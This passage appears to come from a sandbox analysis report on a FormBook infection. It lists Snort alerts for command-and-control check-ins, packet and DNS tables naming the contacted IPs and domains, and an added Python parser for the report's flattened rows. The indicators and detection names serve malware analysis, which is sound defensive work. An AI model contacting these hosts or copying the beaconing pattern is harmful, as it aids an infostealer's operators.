                                                                                                                        06/22/21-18:25:18.311331TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.634.102.136.180
                                                                                                                        06/22/21-18:25:18.451876TCP1201ATTACK-RESPONSES 403 Forbidden804975934.102.136.180192.168.2.6
06/22/21-18:25:23.578876 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49760 | 80 | 192.168.2.6 | 34.102.136.180
06/22/21-18:25:23.578876 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49760 | 80 | 192.168.2.6 | 34.102.136.180
06/22/21-18:25:23.578876 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49760 | 80 | 192.168.2.6 | 34.102.136.180
06/22/21-18:25:23.719109 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49760 | 34.102.136.180 | 192.168.2.6
06/22/21-18:25:39.828190 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49766 | 80 | 192.168.2.6 | 172.67.129.33
06/22/21-18:25:39.828190 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49766 | 80 | 192.168.2.6 | 172.67.129.33
06/22/21-18:25:39.828190 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49766 | 80 | 192.168.2.6 | 172.67.129.33
06/22/21-18:25:51.038848 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49768 | 80 | 192.168.2.6 | 52.79.124.173
06/22/21-18:25:51.038848 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49768 | 80 | 192.168.2.6 | 52.79.124.173
06/22/21-18:25:51.038848 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49768 | 80 | 192.168.2.6 | 52.79.124.173
06/22/21-18:26:06.760886 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49771 | 75.2.81.221 | 192.168.2.6
06/22/21-18:26:17.999823 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49773 | 34.102.136.180 | 192.168.2.6
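The text export of this report runs source port, destination port, source IP and destination IP together with no separator (for example "4976080192.168.2.634.102.136.180"), which makes the split genuinely ambiguous: "49760 / 80 / 192.168.2.6 / 34.102.136.180" and "49760 / 8019 / 2.168.2.6 / 34.102.136.180" are both syntactically valid readings. The following is an added example, not part of the Joe Sandbox report, showing how to recover structured records from the Snort alert rows above and from the TCP/UDP packet rows below. It assumes that the sandbox guest is 192.168.2.6 (as the report shows) and that the guest's side of every connection uses a port in the Windows default dynamic range 49152-65535; every candidate reading is enumerated and only one may survive those constraints, otherwise the row is rejected rather than guessed. Once the rows are structured, the alerts are grouped by the guest's ephemeral port so each check-in and the server's 403 response on the same connection land together. The sample rows are copied from the alert table above.

```python
"""Added example: turn the flattened network rows of a Joe Sandbox report back
into structured records. The report's text export runs source port, destination
port, source IP and destination IP together ("4976080192.168.2.634.102.136.180"),
so the split is ambiguous and has to be resolved with constraints."""
import re
from dataclasses import dataclass
from typing import Iterator

LOCAL_IP = "192.168.2.6"           # the sandbox guest, as seen in the report
EPHEMERAL = range(49152, 65536)    # assumption: Windows default dynamic port range

# A row ends in <sport><dport><src_ip><dst_ip> with no separators: exactly seven
# dot-separated digit groups. Everything before that run is the row's "head".
# Caveat: a Snort message that itself ended in digits would leak into the tail.
TAIL_RE = re.compile(r"^(?P<head>.*?)(?P<tail>\d+(?:\.\d+){6})$")
# Snort row head: "06/22/21-18:25:23.578876TCP2031453ET TROJAN ..." (the SID runs
# into the message, so the message must start with a non-digit).
SNORT_HEAD_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)(?P<proto>TCP|UDP|ICMP)"
    r"(?P<sid>\d+)(?P<msg>\D.*)$"
)


@dataclass(frozen=True)
class Alert:
    timestamp: str
    proto: str
    sid: int
    message: str
    sport: int
    dport: int
    src: str
    dst: str


def _valid_port(s: str) -> bool:
    return s.isdigit() and s[0] != "0" and int(s) <= 65535


def _valid_ip(ip: str) -> bool:
    parts = ip.split(".")
    return len(parts) == 4 and all(
        p.isdigit() and (p == "0" or p[0] != "0") and int(p) <= 255 for p in parts
    )


def candidate_parses(tail: str) -> Iterator[tuple[int, int, str, str]]:
    """Yield every syntactically valid (sport, dport, src_ip, dst_ip) reading.
    Group 0 holds sport+dport+first src octet, group 3 holds last src octet +
    first dst octet; the other five groups are unambiguous octets."""
    g = tail.split(".")
    if len(g) != 7:
        return
    for i in range(1, len(g[0]) - 1):           # end of sport
        for j in range(i + 1, len(g[0])):       # end of dport
            sport, dport, o1 = g[0][:i], g[0][i:j], g[0][j:]
            if not (_valid_port(sport) and _valid_port(dport)):
                continue
            for k in range(1, len(g[3])):       # split of the merged octet pair
                src = ".".join((o1, g[1], g[2], g[3][:k]))
                dst = ".".join((g[3][k:], g[4], g[5], g[6]))
                if _valid_ip(src) and _valid_ip(dst):
                    yield int(sport), int(dport), src, dst


def resolve(tail: str, local_ip: str = LOCAL_IP) -> tuple[int, int, str, str]:
    """Keep only readings where the guest is one endpoint and uses an ephemeral
    port; anything other than exactly one survivor is reported, not guessed."""
    picks = [
        c for c in candidate_parses(tail)
        if (c[2] == local_ip and c[0] in EPHEMERAL)
        or (c[3] == local_ip and c[1] in EPHEMERAL)
    ]
    if len(picks) != 1:
        raise ValueError(f"{tail!r}: {len(picks)} plausible readings {picks}")
    return picks[0]


def parse_snort_row(row: str) -> Alert:
    m = TAIL_RE.match(row.strip())
    h = SNORT_HEAD_RE.match(m["head"]) if m else None
    if not h:
        raise ValueError(f"unrecognised Snort row: {row!r}")
    return Alert(h["ts"], h["proto"], int(h["sid"]), h["msg"].strip(),
                 *resolve(m["tail"]))


def parse_packet_row(row: str) -> tuple[str, int, int, str, str]:
    """TCP/UDP packet rows: '<timestamp> CEST<sport><dport><src><dst>'."""
    m = TAIL_RE.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised packet row: {row!r}")
    return (m["head"].strip(), *resolve(m["tail"]))


def flows_by_guest_port(alerts: list[Alert]) -> dict[int, dict]:
    """Group alerts by the guest's ephemeral port (one TCP connection each) so
    a check-in and the server's 403 on the same connection land together."""
    flows: dict[int, dict] = {}
    for a in alerts:
        outbound = a.src == LOCAL_IP
        port = a.sport if outbound else a.dport
        remote = a.dst if outbound else a.src
        f = flows.setdefault(port, {"remote": remote, "sids": set()})
        f["sids"].add(a.sid)
    return flows


# Rows copied from the Snort alert table of this report (whitespace stripped).
SNORT_ROWS = [
    "06/22/21-18:25:23.578876TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.634.102.136.180",
    "06/22/21-18:25:23.578876TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.634.102.136.180",
    "06/22/21-18:25:23.719109TCP1201ATTACK-RESPONSES 403 Forbidden804976034.102.136.180192.168.2.6",
    "06/22/21-18:25:39.828190TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.6172.67.129.33",
    "06/22/21-18:26:06.760886TCP1201ATTACK-RESPONSES 403 Forbidden804977175.2.81.221192.168.2.6",
]
ALERTS = [parse_snort_row(r) for r in SNORT_ROWS]
FLOWS = flows_by_guest_port(ALERTS)

if __name__ == "__main__":
    for port, f in sorted(FLOWS.items()):
        print(port, f["remote"], sorted(f["sids"]))
```

Grouping by the guest port rather than by remote IP is deliberate: 34.102.136.180 is contacted on several connections, and only the per-connection view tells you that the check-in on port 49760 was answered with a 403 while the one on 49766 to 172.67.129.33 drew no alerted response. The local-IP and ephemeral-port filter is what makes the split decidable here; on a capture where the guest talks to other hosts in 192.168.2.0/24, or where a client binds a low port, `resolve` will raise instead of silently picking a reading.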

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 22, 2021 18:25:02.366617918 CEST | 49756 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:02.409193039 CEST | 80 | 49756 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:02.409516096 CEST | 49756 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:02.409568071 CEST | 49756 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:02.451952934 CEST | 80 | 49756 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:02.550642014 CEST | 80 | 49756 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:02.550687075 CEST | 80 | 49756 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:02.550992012 CEST | 49756 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:02.551043987 CEST | 49756 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:02.593966961 CEST | 80 | 49756 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:07.643510103 CEST | 49757 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:07.686371088 CEST | 80 | 49757 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:07.686568975 CEST | 49757 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:07.686913967 CEST | 49757 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:07.729299068 CEST | 80 | 49757 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:07.827526093 CEST | 80 | 49757 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:07.827579021 CEST | 80 | 49757 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:07.828515053 CEST | 49757 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:07.828553915 CEST | 49757 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:07.872838020 CEST | 80 | 49757 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:13.050292969 CEST | 49758 | 80 | 192.168.2.6 | 213.186.33.5
Jun 22, 2021 18:25:13.103003979 CEST | 80 | 49758 | 213.186.33.5 | 192.168.2.6
Jun 22, 2021 18:25:13.103123903 CEST | 49758 | 80 | 192.168.2.6 | 213.186.33.5
Jun 22, 2021 18:25:13.103247881 CEST | 49758 | 80 | 192.168.2.6 | 213.186.33.5
Jun 22, 2021 18:25:13.156203032 CEST | 80 | 49758 | 213.186.33.5 | 192.168.2.6
Jun 22, 2021 18:25:13.156636000 CEST | 49758 | 80 | 192.168.2.6 | 213.186.33.5
Jun 22, 2021 18:25:13.156657934 CEST | 49758 | 80 | 192.168.2.6 | 213.186.33.5
Jun 22, 2021 18:25:13.209656954 CEST | 80 | 49758 | 213.186.33.5 | 192.168.2.6
Jun 22, 2021 18:25:18.268053055 CEST | 49759 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:18.311075926 CEST | 80 | 49759 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:18.311197996 CEST | 49759 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:18.311331034 CEST | 49759 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:18.354171991 CEST | 80 | 49759 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:18.451875925 CEST | 80 | 49759 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:18.451911926 CEST | 80 | 49759 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:18.452157021 CEST | 49759 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:18.452346087 CEST | 49759 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:18.494915962 CEST | 80 | 49759 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:23.535876989 CEST | 49760 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:23.578468084 CEST | 80 | 49760 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:23.578567028 CEST | 49760 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:23.578876019 CEST | 49760 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:23.622807026 CEST | 80 | 49760 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:23.719109058 CEST | 80 | 49760 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:23.719168901 CEST | 80 | 49760 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:23.719352961 CEST | 49760 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:23.720000029 CEST | 49760 | 80 | 192.168.2.6 | 34.102.136.180
Jun 22, 2021 18:25:23.762451887 CEST | 80 | 49760 | 34.102.136.180 | 192.168.2.6
Jun 22, 2021 18:25:28.954170942 CEST | 49761 | 80 | 192.168.2.6 | 169.62.77.158
Jun 22, 2021 18:25:29.143964052 CEST | 80 | 49761 | 169.62.77.158 | 192.168.2.6
Jun 22, 2021 18:25:29.144161940 CEST | 49761 | 80 | 192.168.2.6 | 169.62.77.158
Jun 22, 2021 18:25:29.144289017 CEST | 49761 | 80 | 192.168.2.6 | 169.62.77.158
Jun 22, 2021 18:25:29.335238934 CEST | 80 | 49761 | 169.62.77.158 | 192.168.2.6
Jun 22, 2021 18:25:29.339704037 CEST | 80 | 49761 | 169.62.77.158 | 192.168.2.6
Jun 22, 2021 18:25:29.339749098 CEST | 80 | 49761 | 169.62.77.158 | 192.168.2.6
Jun 22, 2021 18:25:29.339865923 CEST | 49761 | 80 | 192.168.2.6 | 169.62.77.158
Jun 22, 2021 18:25:29.339929104 CEST | 49761 | 80 | 192.168.2.6 | 169.62.77.158
Jun 22, 2021 18:25:29.529345036 CEST | 80 | 49761 | 169.62.77.158 | 192.168.2.6
Jun 22, 2021 18:25:39.785697937 CEST | 49766 | 80 | 192.168.2.6 | 172.67.129.33
Jun 22, 2021 18:25:39.827903032 CEST | 80 | 49766 | 172.67.129.33 | 192.168.2.6
Jun 22, 2021 18:25:39.828003883 CEST | 49766 | 80 | 192.168.2.6 | 172.67.129.33
Jun 22, 2021 18:25:39.828190088 CEST | 49766 | 80 | 192.168.2.6 | 172.67.129.33
Jun 22, 2021 18:25:39.870101929 CEST | 80 | 49766 | 172.67.129.33 | 192.168.2.6
Jun 22, 2021 18:25:39.894753933 CEST | 80 | 49766 | 172.67.129.33 | 192.168.2.6
Jun 22, 2021 18:25:39.895276070 CEST | 49766 | 80 | 192.168.2.6 | 172.67.129.33
Jun 22, 2021 18:25:39.895589113 CEST | 80 | 49766 | 172.67.129.33 | 192.168.2.6
Jun 22, 2021 18:25:39.895711899 CEST | 49766 | 80 | 192.168.2.6 | 172.67.129.33
Jun 22, 2021 18:25:39.937609911 CEST | 80 | 49766 | 172.67.129.33 | 192.168.2.6
Jun 22, 2021 18:25:45.000245094 CEST | 49767 | 80 | 192.168.2.6 | 166.88.88.176
Jun 22, 2021 18:25:45.191946030 CEST | 80 | 49767 | 166.88.88.176 | 192.168.2.6
Jun 22, 2021 18:25:45.192121029 CEST | 49767 | 80 | 192.168.2.6 | 166.88.88.176
Jun 22, 2021 18:25:45.192420959 CEST | 49767 | 80 | 192.168.2.6 | 166.88.88.176
Jun 22, 2021 18:25:45.386563063 CEST | 80 | 49767 | 166.88.88.176 | 192.168.2.6
Jun 22, 2021 18:25:45.386607885 CEST | 80 | 49767 | 166.88.88.176 | 192.168.2.6
Jun 22, 2021 18:25:45.386637926 CEST | 80 | 49767 | 166.88.88.176 | 192.168.2.6
Jun 22, 2021 18:25:45.386665106 CEST | 80 | 49767 | 166.88.88.176 | 192.168.2.6
Jun 22, 2021 18:25:45.386687040 CEST | 80 | 49767 | 166.88.88.176 | 192.168.2.6
Jun 22, 2021 18:25:45.386976957 CEST | 49767 | 80 | 192.168.2.6 | 166.88.88.176
Jun 22, 2021 18:25:45.387248039 CEST | 49767 | 80 | 192.168.2.6 | 166.88.88.176
Jun 22, 2021 18:25:45.577028990 CEST | 80 | 49767 | 166.88.88.176 | 192.168.2.6
Jun 22, 2021 18:25:50.751912117 CEST | 49768 | 80 | 192.168.2.6 | 52.79.124.173
Jun 22, 2021 18:25:51.038350105 CEST | 80 | 49768 | 52.79.124.173 | 192.168.2.6
Jun 22, 2021 18:25:51.038614035 CEST | 49768 | 80 | 192.168.2.6 | 52.79.124.173
Jun 22, 2021 18:25:51.038847923 CEST | 49768 | 80 | 192.168.2.6 | 52.79.124.173
Jun 22, 2021 18:25:51.324135065 CEST | 80 | 49768 | 52.79.124.173 | 192.168.2.6
Jun 22, 2021 18:25:51.324237108 CEST | 80 | 49768 | 52.79.124.173 | 192.168.2.6
Jun 22, 2021 18:25:51.324249983 CEST | 80 | 49768 | 52.79.124.173 | 192.168.2.6
Jun 22, 2021 18:25:51.324599028 CEST | 49768 | 80 | 192.168.2.6 | 52.79.124.173
Jun 22, 2021 18:25:51.324770927 CEST | 49768 | 80 | 192.168.2.6 | 52.79.124.173
Jun 22, 2021 18:25:51.610224009 CEST | 80 | 49768 | 52.79.124.173 | 192.168.2.6
Jun 22, 2021 18:26:06.555407047 CEST | 49771 | 80 | 192.168.2.6 | 75.2.81.221
Jun 22, 2021 18:26:06.599483967 CEST | 80 | 49771 | 75.2.81.221 | 192.168.2.6
Jun 22, 2021 18:26:06.599612951 CEST | 49771 | 80 | 192.168.2.6 | 75.2.81.221
Jun 22, 2021 18:26:06.599775076 CEST | 49771 | 80 | 192.168.2.6 | 75.2.81.221
Jun 22, 2021 18:26:06.644592047 CEST | 80 | 49771 | 75.2.81.221 | 192.168.2.6
Jun 22, 2021 18:26:06.760885954 CEST | 80 | 49771 | 75.2.81.221 | 192.168.2.6
Jun 22, 2021 18:26:06.760915995 CEST | 80 | 49771 | 75.2.81.221 | 192.168.2.6
Jun 22, 2021 18:26:06.761118889 CEST | 49771 | 80 | 192.168.2.6 | 75.2.81.221
Jun 22, 2021 18:26:06.761343956 CEST | 49771 | 80 | 192.168.2.6 | 75.2.81.221
Jun 22, 2021 18:26:06.789345026 CEST | 80 | 49771 | 75.2.81.221 | 192.168.2.6

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 22, 2021 18:24:00.034044981 CEST | 61346 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:00.094660997 CEST | 53 | 61346 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:01.139225006 CEST | 51774 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:01.198174000 CEST | 53 | 51774 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:02.101680040 CEST | 56023 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:02.155455112 CEST | 53 | 56023 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:02.998409033 CEST | 58384 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:03.048787117 CEST | 53 | 58384 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:04.183419943 CEST | 60261 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:04.241441965 CEST | 53 | 60261 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:05.152579069 CEST | 56061 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:05.205853939 CEST | 53 | 56061 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:06.185880899 CEST | 58336 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:06.243319988 CEST | 53 | 58336 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:07.209156990 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:07.268709898 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:08.178642988 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:08.235013962 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:09.148130894 CEST | 52811 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:09.199281931 CEST | 53 | 52811 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:10.063783884 CEST | 55299 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:10.123028040 CEST | 53 | 55299 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:11.019716024 CEST | 63745 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:11.101739883 CEST | 53 | 63745 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:12.446943045 CEST | 50055 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:12.514972925 CEST | 53 | 50055 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:13.694725990 CEST | 61374 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:13.747822046 CEST | 53 | 61374 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:14.620474100 CEST | 50339 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:14.673840046 CEST | 53 | 50339 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:15.526808023 CEST | 63307 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:15.583053112 CEST | 53 | 63307 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:16.860541105 CEST | 49694 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:16.919770956 CEST | 53 | 49694 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:18.071145058 CEST | 54982 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:18.124247074 CEST | 53 | 54982 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:20.092732906 CEST | 50010 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:20.148947001 CEST | 53 | 50010 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:32.629328012 CEST | 63718 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:32.698751926 CEST | 53 | 63718 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:53.409738064 CEST | 62116 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:53.559686899 CEST | 53 | 62116 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:54.466840982 CEST | 63816 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:54.624713898 CEST | 53 | 63816 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:55.251815081 CEST | 55014 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:55.316796064 CEST | 53 | 55014 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:55.794864893 CEST | 62208 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:55.855622053 CEST | 53 | 62208 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:55.968133926 CEST | 57574 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:56.027344942 CEST | 53 | 57574 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:56.043406963 CEST | 51818 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:56.121126890 CEST | 53 | 51818 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:56.237652063 CEST | 56628 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:56.300812960 CEST | 53 | 56628 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:56.397944927 CEST | 60778 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:56.466319084 CEST | 53 | 60778 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:56.508342028 CEST | 53799 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:56.573071003 CEST | 53 | 53799 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:56.601552963 CEST | 54683 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:56.654877901 CEST | 53 | 54683 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:56.749758959 CEST | 59329 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:56.824110985 CEST | 53 | 59329 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:57.171281099 CEST | 64021 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:57.239022017 CEST | 53 | 64021 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:57.662734032 CEST | 56129 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:57.722476006 CEST | 53 | 56129 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:58.639910936 CEST | 58177 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:58.690794945 CEST | 53 | 58177 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:24:59.686248064 CEST | 50700 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:24:59.747941971 CEST | 53 | 50700 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:25:00.317605972 CEST | 54069 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:25:00.377165079 CEST | 53 | 54069 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:25:00.581388950 CEST | 61178 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:25:00.643455029 CEST | 53 | 61178 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:25:02.295726061 CEST | 57017 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:25:02.361603022 CEST | 53 | 57017 | 8.8.8.8 | 192.168.2.6
Jun 22, 2021 18:25:07.573002100 CEST | 56327 | 53 | 192.168.2.6 | 8.8.8.8
Jun 22, 2021 18:25:07.642466068 CEST | 53 | 56327 | 8.8.8.8 | 192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:12.875062943 CEST5024353192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:12.949099064 CEST53502438.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:18.198398113 CEST6205553192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:18.266730070 CEST53620558.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:23.461308002 CEST6124953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:23.532597065 CEST53612498.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:28.739301920 CEST6525253192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:28.953159094 CEST53652528.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:34.369805098 CEST6436753192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:34.678531885 CEST53643678.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:37.898433924 CEST5506653192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:37.977202892 CEST53550668.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:38.901002884 CEST6021153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:38.975933075 CEST53602118.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:39.699645996 CEST5657053192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:39.783648968 CEST53565708.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:44.923053980 CEST5845453192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:44.998709917 CEST53584548.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:25:50.441529036 CEST5518053192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:25:50.750444889 CEST53551808.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:00.962518930 CEST5872153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:01.023313046 CEST53587218.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:01.347481966 CEST5769153192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:01.425106049 CEST53576918.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:01.534457922 CEST5294353192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:01.609908104 CEST53529438.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:06.486386061 CEST5948953192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:06.553442001 CEST53594898.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:11.774780035 CEST6402253192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:11.852895021 CEST53640228.8.8.8192.168.2.6
                                                                                                                        Jun 22, 2021 18:26:17.734756947 CEST6002353192.168.2.68.8.8.8
                                                                                                                        Jun 22, 2021 18:26:17.813395023 CEST53600238.8.8.8192.168.2.6

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 22, 2021 18:25:02.295726061 CEST | 192.168.2.6 | 8.8.8.8 | 0xaf89 | Standard query (0) | www.invisiongc.net | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:07.573002100 CEST | 192.168.2.6 | 8.8.8.8 | 0x7d4c | Standard query (0) | www.killrstudio.com | A (IP address) | IN (0x0001)
